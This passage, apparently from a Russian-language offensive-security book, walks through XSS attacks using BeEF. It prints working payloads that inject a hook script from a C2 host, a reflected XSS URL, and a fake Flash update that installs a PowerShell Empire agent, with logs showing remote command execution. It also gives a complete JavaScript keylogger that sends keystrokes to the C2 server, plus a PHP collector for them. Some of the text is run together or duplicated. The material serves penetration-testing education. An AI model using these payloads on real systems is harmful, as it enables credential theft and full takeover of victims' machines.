ции confirm(), предотвращая ошибки обработки JavaScript.

<script>

sure = confirm("Hello "); eval("var hook = document. createElement('script');hook.src='https://c2.spider.ml/hook. js';document.head.append(hook);"); sure = false; //, are you sure you wish to logout?");

if (sure) {

document.location = "/logout";

}

</script>

Внедрение кода JavaScript в середине функции может создать некоторые проблемы, если он не был тщательно обработан. HTML будет вести себя довольно снисходительно, если мы пропустили закрывающий тег или нарушили остальную часть страницы, однако некоторые механизмы JavaScript не смогут выполнитьсинтаксический анализ кода и наш вредоносный кодтак и не будет выполнен.

Далее будем перехватывать сайт http://badguys.local, используя приведенную ниже XSS-атаку. Это намного более простая отраженная XSS-атака, но она должна сделать свое дело,чтобы продемонстрировать возможности BeEF.

http://badguys.local/cross-site-scripting/form-field?qs=»><script+asyn c+src=https://c2.spider.ml/hook.js></script><span+id=»

Параметр qs уязвим для отраженных XSS-атак, и мы будем атаковать жертв

спомощью нашей ловушки BeEF.

Вслучае успеха в журнале командно-контрольного сервера BeEF появится новый браузер, IP-адрес, браузер, операционная система и домен, на котором выполняется полезная нагрузка:

[20:21:37][*] New Hooked Browser [id:1, ip:196.247.56.62, browser:CUNKNOWN,

os:Windows-7], hooked domain [badguys.local:80]

Теперь можно приступить к выполнению различных команд (или модулей) в браузере жертвы.

Атаки с применением методов социальной инженерии

Безусловно, самым простым способом сбора учетных данных или выполнения вредоносного кода есть и всегда будет социальная инженерия. XSS-атаки, в частности, дают нам преимущество выполнения кода на веб-сайте, которо-

скольку даже самый бдительный пользователь будет доверять узнаваемому веб-адресу.

BeEF предоставляет нам несколько модулей социальной инженерии, в том числе следующие:

Fake Notification Bar: доставляет вредоносное программное обеспечение, имитируя панели уведомлений браузера;

Fake Flash Update: доставляет вредоносное программное обеспечение, замаскированное под всплывающее окно, уведомляющее о наличии обновления для Flash player1;

Pretty Theft: перехватывает учетные данные, используя поддельные всплывающие окна знакомых сайтов;

Fake LastPass: захватывает учетные данные LastPass, используя поддельное всплывающее окно.

Чтобы продемонстрировать распространенную атаку с применением методов социальной инженерии с помощью BeEF, будем использовать модуль Fake Flash Update, расположенный в разделе Commands в категории Social Engeneering (Социальная инженерия).Этот метод по-прежнему на удивление эффективен в реальных условиях, и BeEF упрощаетдоставку исполняемой полезной нагрузки жертве.

Настройка проста: нам нужно указать модуль для нашей полезной нагрузки, которая будет представлена жертве в виде поддельного файла обновления

Flash player.

Рис.9.11. Настройка модуля Fake Flash Update

1Flash сейчас постепенно выходит из употребления, и этот инструмент уже не столь актуален.–

Прим.ред.

жение по умолчанию, размещенное на сервере BeEF. Наша полезная нагрузка Fake Flash (FlashUpdate.bat) представляет собой простой пакетный скрипт, который будет запускать агента PowerShell Empire.У настакже есть отдельный командно-контрольный сервер Empire,работающий в облаке,ожидающий регистрации агента.

Empire – отличное средство с открытым исходным кодом, которое позволяет полностью контролировать компьютеры под управлением Windows и Linux. Агент Windows целиком написан на PowerShell и может использоваться для управления каждым аспектом жертвы. Это очень эффективный троян удаленного доступа­ (RAT). Linux также поддерживается через агента Python. У него есть масса постэксплуатационных модулей,и он легко развертывается в облаке.Более подробную информацию можно най-

ти на странице https://www.powershellempire.com.

Мы разместили загрузчик агента Empire (FlashUpdate.bat) на нашем ко- мандно-контрольном сервере, чтобы упростить процесс. Fake Flash Update предоставит пользователю изображение, похожее на приглашение обновить Flash player. После нажатия на изображение начнется загрузка вредоносного программного обеспечения. Пользователю еще придется выполнить вредо- носныйкод,но,какяужеговорил,этопо-прежнемуоченьэффективныйметод эксплуатации.

ПринажатиинакнопкуExecute (Выполнить)FakeFlashUpdateпокажетподдельное сообщение в браузере жертвы.

Рис.9.12. Модуль Fake Flash Update в действии

Командно-контрольный сервер Empire получает соединение с агентом, что дает нам полный контроль над компьютером жертвы, а не только над браузером.

(Empire: listeners) > list

[*] Active listeners:

(Empire: listeners) > [*] Sending POWERSHELL stager (stage 1) to

196.247.56.62

[*] New agent XH3U861L checked in

[+] Initial agent XH3U861L from 196.247.56.62 now active [*] Sending agent (stage 2) to XH3U861L at 196.247.56.62

Мы можем взаимодействоватьс агентом и выполнятьпроизвольные команды (а также многое другое).

(Empire: listeners) > agents (Empire: agents) > interact XH3U861L (Empire: XH3U861L) > shell whoami [...]

BG-CORP52176\ThePlague

..Command execution completed.

С помощью XSS-атаки мы смогли обманным путем заставить жертву запус­ тить нашу вредоносную программу и позволить нам повысить привилегии из браузера до полного контроля над машиной жертвы.

Существуют и другие доступные модули социальной инженерии, и большинство из них довольно успешно.

Кейлоггер

В ходе XSS-атак часто используется старомодный кейлоггер. JavaScript позволяет очень легко фиксировать нажатия клавиш, и, поскольку у нас есть до-

UI(log/.zombie.json) call: 18.254s - [User Typed] er2018

Мы видим, как выглядят учетные данные, вводимые в перехваченное приложение.Слова разделены из-за частоты,с которой ловушка BeEF связывается с удаленным сервером и отправляет перехваченный ключевой буфер. В большинстве случаев очевидно,что печатает пользователь.

Встроенный кейлоггер довольно хорош, и большинство атак выигрывает благодаря ему. Однако в определенных ситуациях может потребоваться более настраиваемый кейлоггер. Возможно, нам нужно отправить ключи в другое место или мы просто хотим записать дополнительные нажатия клавиш,таких как Backspace (Возврат), Enter (Ввод) и Tab.

Использование BeEF в качестве инструмента атаки возможно, потому что XSS позволяет выполнять код JavaScript в браузере. Все команды, которые мы посылаем,–это просто фрагменты кода,выполняющиеся так,как если бы они были частью приложения.

Как и ожидалось,в BeEF есть команда,которую можно использоватьдля выполнения любого нужного нам кода JavaScript в перехваченном браузере.Наш пользовательский кейлоггер не очень продвинутый, но позволяет настроить его в соответствии с нашими потребностями.

Первое,чтомысделаем,–этоопределимпеременнуюpush_url,тоестьURL- адрескомандно-контрольногосервера,накоторыйбудемотправлятьперехва- ченные нажатия клавиш.Этотсерверный компонентрасшифровываетинформацию о кейлоггере и сохраняет ее в текстовом файле для просмотра.

var push_url = "http://c2.spider.ml/log.php?session=";

Далеебудемиспользоватьметодdocument.addEventListener() длязапуска функции-обработчика всякий раз, когда где-то на странице происходит событие keydown. Это событие указывает на то, что пользователь нажал клавишу, и дает нам возможность проверить и записать это действие программными средствами. Ключи добавятся в буферную переменную, которая позже будет отправлена в переменную push_url.

var buffer = []; document.addEventListener("keydown", function(e) {

key = e.key;

if (key.length > 1 || key == " ") { key = "[" + key + "]" } buffer.push(key);

});

buffer.push(key); });

window.setInterval(function() { if (buffer.length > 0) {

var data = encodeURIComponent(btoa(buffer.join(''))); var img = new Image();

img.src = push_url + data;

buffer = [];

}

}, 2000);

Чтобы завершить этот кейлоггер, нам нужен серверный компонент для перехвата отправки, а также для декодирования и сохранения зарегистрированных нажатий клавиш.

Можно написать для этой цели небольшой скрипт на языке PHP.

root@spider-c2-1:~/keylogger# cat log.php <?php

if (isset($_GET["session"])) {

$keys = @base64_decode($_GET["session"]);

$logfile = fopen("keys.log", "a+"); fwrite($logfile, $keys);

fclose($logfile);

}

?>

Первая строка – это оператор if, который проверяет, поступили ли какиелибо данные через параметр session переменной $_GET.Если доступные данные есть,сценарий расшифрует их и сохранит в переменной $keys для записи на диск в файле keys.log с помощью функции fwrite().

Можно запуститьвстроенный PHP-сервер на порту 80,чтобы он обслуживал файл log.php,с которым наш кейлоггер JavaScript будет обмениваться данными.

root@spider-c2-1:~/keylogger# php -S 0.0.0.0:80 PHP 7.0.30-0+deb9u1 Development Server started Listening on http://0.0.0.0:80

Document root is /root/keylogger Press Ctrl-C to quit.